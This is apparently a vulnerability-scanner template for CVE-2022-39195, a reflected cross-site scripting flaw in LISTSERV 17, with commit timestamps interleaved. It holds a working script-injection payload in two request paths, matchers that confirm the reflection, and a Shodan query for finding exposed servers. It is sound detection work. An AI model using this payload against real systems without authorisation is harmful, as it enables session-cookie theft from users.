2023-01-22 17:50:06 +00:00
id : CVE-2022-39195
info :
2023-02-03 17:47:14 +00:00
name : LISTSERV 17 - Cross-Site Scripting
2023-01-22 17:50:06 +00:00
author : arafatansari
severity : medium
description : |
2023-02-03 17:47:14 +00:00
LISTSERV 17 web interface contains a cross-site scripting vulnerability. An attacker can inject arbitrary JavaScript or HTML via the "c" parameter, thereby possibly allowing the attacker to steal cookie-based authentication credentials and launch other attacks.
2023-09-06 11:59:08 +00:00
remediation : |
Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability.
2023-01-22 17:50:06 +00:00
reference :
- https://packetstormsecurity.com/files/170552/LISTSERV-17-Cross-Site-Scripting.html
2023-01-23 10:36:01 +00:00
- https://peach.ease.lsoft.com/scripts/wa-PEACH.exe?A0=LSTSRV-L
- https://packetstormsecurity.com/2301-exploits/listserv17-xss.txt
2023-02-03 17:47:14 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-39195
2023-01-23 05:48:05 +00:00
classification :
2023-01-26 18:21:24 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
2023-01-23 05:48:05 +00:00
cve-id : CVE-2022-39195
2023-01-26 18:21:24 +00:00
cwe-id : CWE-79
2023-07-11 19:49:27 +00:00
epss-score : 0.00125
2023-08-31 11:46:18 +00:00
epss-percentile : 0.46238
2023-09-06 11:59:08 +00:00
cpe : cpe:2.3:a:lsoft:listserv:17.0:*:*:*:*:*:*:*
2023-01-22 17:50:06 +00:00
metadata :
2023-06-04 08:13:42 +00:00
verified : true
2023-09-06 11:59:08 +00:00
max-request : 2
2023-07-11 19:49:27 +00:00
vendor : lsoft
product : listserv
2023-09-06 11:59:08 +00:00
shodan-query : http.html:"LISTSERV"
2023-01-23 10:36:01 +00:00
tags : cve,cve2022,xss,listserv,packetstorm
2023-01-22 17:50:06 +00:00
2023-04-27 04:28:59 +00:00
http :
2023-01-23 05:48:05 +00:00
- method : GET
path :
2023-01-23 05:50:08 +00:00
- "{{BaseURL}}/scripts/wa.exe?TICKET=test&c=%3Cscript%3Ealert(document.domain)%3C/script%3E"
- "{{BaseURL}}/scripts/wa-HAP.exe?TICKET=test&c=%3Cscript%3Ealert(document.domain)%3C/script%3E"
2023-01-22 17:50:06 +00:00
2023-01-23 05:48:05 +00:00
stop-at-first-match : true
2023-07-11 19:49:27 +00:00
2023-01-22 17:50:06 +00:00
matchers-condition : and
matchers :
- type : word
words :
2023-01-23 05:50:08 +00:00
- "<script>alert(document.domain)</script>"
2023-01-23 05:48:05 +00:00
- "LISTSERV"
case-insensitive : true
2023-07-11 19:49:27 +00:00
condition : and
2023-01-23 05:48:05 +00:00
- type : word
part : header
words :
- "text/html"
- type : status
status :
- 200